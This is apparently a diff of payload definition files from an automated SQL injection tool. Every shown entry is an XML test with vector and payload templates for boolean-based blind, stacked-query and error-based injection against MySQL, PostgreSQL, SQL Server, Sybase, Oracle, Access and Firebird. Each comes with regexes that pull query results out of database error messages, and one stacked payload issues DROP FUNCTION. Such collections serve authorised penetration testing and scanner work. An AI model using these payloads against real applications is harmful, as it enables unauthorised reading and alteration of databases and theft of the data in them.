            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft Access</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- TODO: check against SAP MaxDB -->
 | 
			
		||||
    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
 | 
			
		||||
 | 
			
		||||
    <!-- Stacked conditional-error blind queries tests -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL stacked conditional-error blind queries</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
 | 
			
		||||
        <stype>1</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- End of stacked conditional-error blind queries tests -->
 | 
			
		||||
</root>
 | 
			
		||||
							
								
								
									
										854
									
								
								xml/payloads/02_error_based.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
									
								
							| 
						 | 
				
			
			@ -0,0 +1,854 @@
 | 
			
		|||
<?xml version="1.0" encoding="UTF-8"?>
 | 
			
		||||
 | 
			
		||||
<root>
 | 
			
		||||
    <!-- Error-based tests - WHERE or HAVING clause -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.5</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 4.1 AND error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 4.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
            <dbms_version>>= 8.1.6</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Firebird AND error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Firebird</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.0 OR error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 5.5</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>>= 4.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL OR error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
 | 
			
		||||
        <stype>2</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
 | 
			
		||||
        </response>
